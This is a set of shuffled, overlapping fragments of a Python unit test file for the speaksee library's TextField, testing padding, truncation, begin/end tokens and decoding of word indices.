"field.decode(np.asarray(word_idxs)) == expected_output assert field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output class MyVocab(object): def __init__(self, eos_token): self.itos", "include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) def test_decode(self): def test_all_dtypes(word_idxs, expected_output): assert field.decode(word_idxs)", "[[\"a\", \"sentence\", \"of\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] expected_lengths = [3, 2,", "\"<eos>\"], [\"<bos>\", \"yet\", \"another\", \"<eos>\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\", \"<eos>\",", "1], [3, 3, 2, 1], [2, 1, 1, 1]] 
expected_output = ['a c',", "= data.TextField(fix_length=3) minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\",", "\"<eos>\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\", \"<eos>\", \"<pad>\", \"<pad>\"]] expected_lengths =", "== expected_padded_minibatch field = data.TextField(fix_length=4, init_token=\"<bos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) #", "expected_lengths = [3, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=3, include_lengths=True)", "expected_padded_minibatch = [[\"<bos>\", \"a\", \"sentence\", \"of\"], [\"<bos>\", \"yet\", \"another\", \"<pad>\"], [\"<bos>\", \"one\", \"last\",", "eos_token, 3: 'c'} field = data.TextField() field.vocab = MyVocab(field.eos_token) # Empty captions (not", "== expected_padded_minibatch field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) def", "\"<pad>\"], [\"one\", \"last\", \"sent\"]] assert field.pad(minibatch) == expected_padded_minibatch # Test init_token is properly", "\"data\", \".\", \"<eos>\"], [\"<bos>\", \"yet\", \"another\", \"<eos>\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"<bos>\", \"one\", \"last\",", "field = data.TextField(fix_length=4, init_token=\"<bos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test init_token", "== (expected_padded_minibatch, expected_lengths) # Test init_token and eos_token are properly handled. 
field =", "\"yet\", \"another\", \"<eos>\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\", \"<eos>\", \"<pad>\", \"<pad>\"]]", "expected_output = '' assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output word_idxs =", "import numpy as np import torch '''class TestImageField(object): def test_preprocessing(self): field = data.ImageField()", "expected_output # Single caption word_idxs = [0, 3, 2, 1] expected_output = 'a", "field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output class MyVocab(object): def __init__(self, eos_token): self.itos = {0: 'a', 1:", "\".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"],", "2, 1] expected_output = 'a c' test_all_dtypes(word_idxs, expected_output) # Batch of captions word_idxs", "# Single caption word_idxs = [0, 3, 2, 1] expected_output = 'a c'", "\"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"<bos>\", \"a\", \"sentence\", \"of\"],", "= [[\"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] assert field.pad(minibatch) ==", "'a', 1: 'b', 2: eos_token, 3: 'c'} field = data.TextField() field.vocab = MyVocab(field.eos_token)", "\"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\"],", "\"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [ [\"<bos>\", \"a\", \"sentence\",", "field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output word_idxs = [[]] expected_output = ['',", "[\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\"], [\"yet\", \"another\", \"<pad>\"],", "handled. 
field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\",", "assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) field = data.TextField(fix_length=3, truncate_first=True) expected_padded_minibatch = [[\"of\", \"data\",", "= data.TextField(fix_length=3, include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) field = data.TextField(fix_length=3, truncate_first=True) expected_padded_minibatch", "# Empty captions (not tested for PyTorch tensors) word_idxs = [] expected_output =", "'a c' test_all_dtypes(word_idxs, expected_output) # Batch of captions word_idxs = [[0, 3, 2,", "== expected_padded_minibatch field = data.TextField(fix_length=3, include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) field =", "field = data.TextField(fix_length=3, truncate_first=True) expected_padded_minibatch = [[\"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\"], [\"one\",", "(expected_padded_minibatch, expected_lengths) # Test init_token and eos_token are properly handled. 
field = data.TextField(init_token=\"<bos>\",", "\"data\", \".\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] assert field.pad(minibatch) == expected_padded_minibatch #", "\"sentence\", \"of\"], [\"<bos>\", \"yet\", \"another\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\"]] expected_lengths = [4,", "5] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\", include_lengths=True) assert field.pad(minibatch) ==", "word_idxs = [[]] expected_output = ['', ] assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs))", "[\"<bos>\", \"one\", \"last\", \"sent\"]] expected_lengths = [4, 3, 4] assert field.pad(minibatch) == expected_padded_minibatch", "expected_lengths) field = data.TextField(fix_length=3, truncate_first=True) expected_padded_minibatch = [[\"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\"],", "'' expected_image = '' assert field.preprocess(image) == expected_image ''' class TestTextField(object): def test_pad(self):", "\"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] expected_lengths", "\"of\"], [\"<bos>\", \"yet\", \"another\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\"]] expected_lengths = [4, 3,", "\"of\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] expected_lengths = [3, 2, 3] assert", "expected_padded_minibatch = [[\"a\", \"sentence\", \"of\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] expected_lengths =", "\"last\", \"sent\"]] expected_padded_minibatch = [[\"<bos>\", \"a\", \"sentence\", \"of\"], [\"<bos>\", \"yet\", \"another\", \"<pad>\"], [\"<bos>\",", "are properly handled. 
field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\",", "data.TextField(fix_length=4, init_token=\"<bos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test init_token and eos_token", "data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) def test_decode(self): def test_all_dtypes(word_idxs, expected_output):", "= 'a c' test_all_dtypes(word_idxs, expected_output) # Batch of captions word_idxs = [[0, 3,", "field.vocab = MyVocab(field.eos_token) # Empty captions (not tested for PyTorch tensors) word_idxs =", "expected_output): assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output assert field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output", "field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output assert field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output class MyVocab(object):", "captions (not tested for PyTorch tensors) word_idxs = [] expected_output = '' assert", "\"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"one\", \"last\", \"sent\", \"<pad>\",", "expected_output assert field.decode(np.asarray(word_idxs)) == expected_output # Single caption word_idxs = [0, 3, 2,", "== expected_output class MyVocab(object): def __init__(self, eos_token): self.itos = {0: 'a', 1: 'b',", "[\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] expected_lengths = [3, 2, 3] assert field.pad(minibatch)", "expected_lengths) # Test init_token and eos_token are properly handled. 
field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\")", "\"sent\"]] expected_padded_minibatch = [ [\"<bos>\", \"a\", \"sentence\", \"of\", \"data\", \".\", \"<eos>\"], [\"<bos>\", \"yet\",", "expected_output assert field.decode(np.asarray(word_idxs)) == expected_output assert field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output class MyVocab(object): def __init__(self,", "TestImageField(object): def test_preprocessing(self): field = data.ImageField() image = '' expected_image = '' assert", "field.pad(minibatch) == expected_padded_minibatch field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths)", "\"sent\"]] expected_lengths = [3, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=3,", "= [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch =", "1: 'b', 2: eos_token, 3: 'c'} field = data.TextField() field.vocab = MyVocab(field.eos_token) #", "'b', 2: eos_token, 3: 'c'} field = data.TextField() field.vocab = MyVocab(field.eos_token) # Empty", "assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output assert field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output class", "4] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=4, init_token=\"<bos>\", include_lengths=True) assert field.pad(minibatch) ==", "of captions word_idxs = [[0, 3, 2, 1], [3, 3, 2, 1], [2,", "\"<pad>\", \"<pad>\", \"<pad>\"], [\"one\", \"last\", \"sent\", \"<pad>\", \"<pad>\"]] expected_lengths = [5, 2, 3]", "\"another\", \"<eos>\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\", \"<eos>\", \"<pad>\", \"<pad>\"]] expected_lengths", "(expected_padded_minibatch, expected_lengths) # Test fix_length 
properly truncates and pads. field = data.TextField(fix_length=3) minibatch", "\"<pad>\", \"<pad>\"]] expected_lengths = [7, 4, 5] assert field.pad(minibatch) == expected_padded_minibatch field =", "\"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\", \"<pad>\", \"<pad>\"],", "[\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\",", "3, 2, 1], [3, 3, 2, 1], [2, 1, 1, 1]] expected_output =", "[4, 3, 4] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=4, init_token=\"<bos>\", include_lengths=True) assert", "eos_token=\"<eos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) def test_decode(self): def test_all_dtypes(word_idxs, expected_output): assert", "\"sent\"]] assert field.pad(minibatch) == expected_padded_minibatch # Test init_token is properly handled. field =", "\"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\", \"data\",", "assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test fix_length properly truncates and pads. field", "= data.TextField() field.vocab = MyVocab(field.eos_token) # Empty captions (not tested for PyTorch tensors)", "[[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"one\", \"last\", \"sent\",", "\"sentence\", \"of\", \"data\", \".\", \"<eos>\"], [\"<bos>\", \"yet\", \"another\", \"<eos>\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"<bos>\",", "expected_image ''' class TestTextField(object): def test_pad(self): # Default case. 
field = data.TextField() minibatch", "\"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"<bos>\", \"a\",", "word_idxs = [[0, 3, 2, 1], [3, 3, 2, 1], [2, 1, 1,", "[7, 4, 5] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\", include_lengths=True) assert", "from __future__ import unicode_literals import unittest import speaksee.data as data import numpy as", "\"<pad>\"], [\"one\", \"last\", \"sent\", \"<pad>\", \"<pad>\"]] expected_lengths = [5, 2, 3] assert field.pad(minibatch)", "expected_lengths) def test_decode(self): def test_all_dtypes(word_idxs, expected_output): assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) ==", "import torch '''class TestImageField(object): def test_preprocessing(self): field = data.ImageField() image = '' expected_image", "1] expected_output = 'a c' test_all_dtypes(word_idxs, expected_output) # Batch of captions word_idxs =", "\"<pad>\", \"<pad>\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\", \"<eos>\", \"<pad>\", \"<pad>\"]] expected_lengths = [7,", "= ['', ] assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output # Single", "init_token=\"<bos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test init_token and eos_token are", "[\"one\", \"last\", \"sent\", \"<pad>\", \"<pad>\"]] expected_lengths = [5, 2, 3] assert field.pad(minibatch) ==", "\"last\", \"sent\"]] expected_lengths = [3, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch field =", "= data.TextField(include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test fix_length properly truncates and", "\"<pad>\", \"<pad>\"]] expected_lengths = [5, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch field =", 
"\".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\"], [\"yet\", \"another\",", "\".\"], [\"yet\", \"another\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"one\", \"last\", \"sent\", \"<pad>\", \"<pad>\"]] expected_lengths =", "''' class TestTextField(object): def test_pad(self): # Default case. field = data.TextField() minibatch =", "3, 2, 1], [2, 1, 1, 1]] expected_output = ['a c', 'c c',", "\"another\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\"]] expected_lengths = [4, 3, 4] assert field.pad(minibatch)", "\"sentence\", \"of\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] expected_lengths = [3, 2, 3]", "field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output # Single caption word_idxs = [0,", "\"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] assert field.pad(minibatch) == expected_padded_minibatch # Test init_token is", "'' assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output word_idxs = [[]] expected_output", "field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) def test_decode(self): def", "expected_padded_minibatch field = data.TextField(fix_length=3, include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) field = data.TextField(fix_length=3,", "assert field.preprocess(image) == expected_image ''' class TestTextField(object): def test_pad(self): # Default case. field", "[[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [", "Test fix_length properly truncates and pads. 
field = data.TextField(fix_length=3) minibatch = [[\"a\", \"sentence\",", "'''class TestImageField(object): def test_preprocessing(self): field = data.ImageField() image = '' expected_image = ''", "assert field.decode(np.asarray(word_idxs)) == expected_output word_idxs = [[]] expected_output = ['', ] assert field.decode(word_idxs)", "== expected_image ''' class TestTextField(object): def test_pad(self): # Default case. field = data.TextField()", "test_all_dtypes(word_idxs, expected_output) # Batch of captions word_idxs = [[0, 3, 2, 1], [3,", "expected_output assert field.decode(np.asarray(word_idxs)) == expected_output word_idxs = [[]] expected_output = ['', ] assert", "image = '' expected_image = '' assert field.preprocess(image) == expected_image ''' class TestTextField(object):", "# Test fix_length properly truncates and pads. field = data.TextField(fix_length=3) minibatch = [[\"a\",", "field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) field = data.TextField(fix_length=3, truncate_first=True) expected_padded_minibatch = [[\"of\", \"data\", \".\"],", "\".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"<bos>\", \"a\", \"sentence\", \"of\"], [\"<bos>\",", "field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) def test_decode(self): def test_all_dtypes(word_idxs, expected_output): assert field.decode(word_idxs) == expected_output", "field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test fix_length properly truncates and pads. 
field =", "expected_padded_minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"one\",", "= [[0, 3, 2, 1], [3, 3, 2, 1], [2, 1, 1, 1]]", "unittest import speaksee.data as data import numpy as np import torch '''class TestImageField(object):", "4, 5] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\", include_lengths=True) assert field.pad(minibatch)", "expected_padded_minibatch = [ [\"<bos>\", \"a\", \"sentence\", \"of\", \"data\", \".\", \"<eos>\"], [\"<bos>\", \"yet\", \"another\",", "2, 1], [2, 1, 1, 1]] expected_output = ['a c', 'c c', '']", "\"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\",", "Batch of captions word_idxs = [[0, 3, 2, 1], [3, 3, 2, 1],", "assert field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output class MyVocab(object): def __init__(self, eos_token): self.itos = {0: 'a',", "['', ] assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output # Single caption", "class TestTextField(object): def test_pad(self): # Default case. 
field = data.TextField() minibatch = [[\"a\",", "= data.TextField(fix_length=3, truncate_first=True) expected_padded_minibatch = [[\"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\",", "expected_padded_minibatch field = data.TextField(include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test fix_length properly", "(expected_padded_minibatch, expected_lengths) def test_decode(self): def test_all_dtypes(word_idxs, expected_output): assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs))", "eos_token): self.itos = {0: 'a', 1: 'b', 2: eos_token, 3: 'c'} field =", "import speaksee.data as data import numpy as np import torch '''class TestImageField(object): def", "case. field = data.TextField() minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"],", "expected_padded_minibatch field = data.TextField(fix_length=4, init_token=\"<bos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test", "data.TextField() field.vocab = MyVocab(field.eos_token) # Empty captions (not tested for PyTorch tensors) word_idxs", "[\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] assert field.pad(minibatch) == expected_padded_minibatch # Test init_token", "coding: utf-8 -*- from __future__ import unicode_literals import unittest import speaksee.data as data", "Single caption word_idxs = [0, 3, 2, 1] expected_output = 'a c' test_all_dtypes(word_idxs,", "\"another\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"one\", \"last\", \"sent\", \"<pad>\", \"<pad>\"]] expected_lengths = [5, 2,", "\"sent\", \"<eos>\", \"<pad>\", \"<pad>\"]] expected_lengths = [7, 4, 5] assert field.pad(minibatch) == expected_padded_minibatch", "assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=4, init_token=\"<bos>\", include_lengths=True) assert field.pad(minibatch) == 
(expected_padded_minibatch,", "1], [2, 1, 1, 1]] expected_output = ['a c', 'c c', ''] test_all_dtypes(word_idxs,", "Test init_token is properly handled. field = data.TextField(fix_length=4, init_token=\"<bos>\") minibatch = [[\"a\", \"sentence\",", "\"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\"], [\"yet\",", "as data import numpy as np import torch '''class TestImageField(object): def test_preprocessing(self): field", "\"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]]", "= [[\"<bos>\", \"a\", \"sentence\", \"of\"], [\"<bos>\", \"yet\", \"another\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\"]]", "__init__(self, eos_token): self.itos = {0: 'a', 1: 'b', 2: eos_token, 3: 'c'} field", "field = data.TextField(include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test fix_length properly truncates", "\"yet\", \"another\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\"]] expected_lengths = [4, 3, 4] assert", "\"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\", \"<pad>\",", "assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=3, include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths)", "field = data.TextField() minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\",", "= data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\",", "\"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\", \"<eos>\", \"<pad>\", \"<pad>\"]] expected_lengths = [7, 4, 5]", "expected_lengths = [5, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch field = 
data.TextField(include_lengths=True) assert", "\"sent\"]] expected_padded_minibatch = [[\"<bos>\", \"a\", \"sentence\", \"of\"], [\"<bos>\", \"yet\", \"another\", \"<pad>\"], [\"<bos>\", \"one\",", "data.TextField() minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]]", "as np import torch '''class TestImageField(object): def test_preprocessing(self): field = data.ImageField() image =", "= '' expected_image = '' assert field.preprocess(image) == expected_image ''' class TestTextField(object): def", "\"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"<bos>\", \"a\", \"sentence\",", "assert field.decode(np.asarray(word_idxs)) == expected_output # Single caption word_idxs = [0, 3, 2, 1]", "field.preprocess(image) == expected_image ''' class TestTextField(object): def test_pad(self): # Default case. field =", "# -*- coding: utf-8 -*- from __future__ import unicode_literals import unittest import speaksee.data", "\"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\",", "== expected_padded_minibatch field = data.TextField(include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test fix_length", "PyTorch tensors) word_idxs = [] expected_output = '' assert field.decode(word_idxs) == expected_output assert", "3, 2, 1] expected_output = 'a c' test_all_dtypes(word_idxs, expected_output) # Batch of captions", "expected_padded_minibatch = [[\"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] assert field.pad(minibatch)", "Empty captions (not tested for PyTorch tensors) word_idxs = [] expected_output = ''", "[\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"<bos>\", \"a\", \"sentence\", \"of\"], [\"<bos>\", \"yet\",", 
"field.decode(np.asarray(word_idxs)) == expected_output word_idxs = [[]] expected_output = ['', ] assert field.decode(word_idxs) ==", "field.decode(np.asarray(word_idxs)) == expected_output # Single caption word_idxs = [0, 3, 2, 1] expected_output", "[3, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=3, include_lengths=True) assert field.pad(minibatch)", "[2, 1, 1, 1]] expected_output = ['a c', 'c c', ''] test_all_dtypes(word_idxs, expected_output)", "== expected_output assert field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output class MyVocab(object): def __init__(self, eos_token): self.itos =", "data.TextField(fix_length=4, init_token=\"<bos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\",", "[\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [ [\"<bos>\", \"a\", \"sentence\", \"of\", \"data\", \".\", \"<eos>\"],", "\"last\", \"sent\", \"<pad>\", \"<pad>\"]] expected_lengths = [5, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch", "\"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\",", "properly handled. 
field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"],", "data.TextField(fix_length=3) minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]]", "= [4, 3, 4] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=4, init_token=\"<bos>\", include_lengths=True)", "expected_output = ['', ] assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output #", "field.pad(minibatch) == expected_padded_minibatch field = data.TextField(include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test", "data.ImageField() image = '' expected_image = '' assert field.preprocess(image) == expected_image ''' class", "[\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\",", "2: eos_token, 3: 'c'} field = data.TextField() field.vocab = MyVocab(field.eos_token) # Empty captions", "'' assert field.preprocess(image) == expected_image ''' class TestTextField(object): def test_pad(self): # Default case.", "\"last\", \"sent\", \"<eos>\", \"<pad>\", \"<pad>\"]] expected_lengths = [7, 4, 5] assert field.pad(minibatch) ==", "\"of\", \"data\", \".\", \"<eos>\"], [\"<bos>\", \"yet\", \"another\", \"<eos>\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"<bos>\", \"one\",", "data.TextField(fix_length=3, truncate_first=True) expected_padded_minibatch = [[\"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]]", "\"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\"]] expected_lengths = [4, 3, 4] assert field.pad(minibatch) ==", "\"a\", \"sentence\", \"of\", \"data\", \".\", \"<eos>\"], [\"<bos>\", \"yet\", \"another\", \"<eos>\", \"<pad>\", \"<pad>\", \"<pad>\"],", "tested for PyTorch tensors) word_idxs = [] expected_output = '' 
assert field.decode(word_idxs) ==", "3] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=3, include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch,", "[5, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(include_lengths=True) assert field.pad(minibatch) ==", "[[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\",", "\"<pad>\"]] expected_lengths = [7, 4, 5] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(init_token=\"<bos>\",", "field = data.ImageField() image = '' expected_image = '' assert field.preprocess(image) == expected_image", "[[\"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] assert field.pad(minibatch) == expected_padded_minibatch", "def test_all_dtypes(word_idxs, expected_output): assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output assert field.decode(torch.from_numpy(np.asarray(word_idxs)))", "self.itos = {0: 'a', 1: 'b', 2: eos_token, 3: 'c'} field = data.TextField()", "MyVocab(object): def __init__(self, eos_token): self.itos = {0: 'a', 1: 'b', 2: eos_token, 3:", "== (expected_padded_minibatch, expected_lengths) # Test fix_length properly truncates and pads. field = data.TextField(fix_length=3)", "[3, 3, 2, 1], [2, 1, 1, 1]] expected_output = ['a c', 'c", "import unicode_literals import unittest import speaksee.data as data import numpy as np import", "and eos_token are properly handled. field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\") minibatch = [[\"a\", \"sentence\",", "eos_token=\"<eos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]]", "properly handled. 
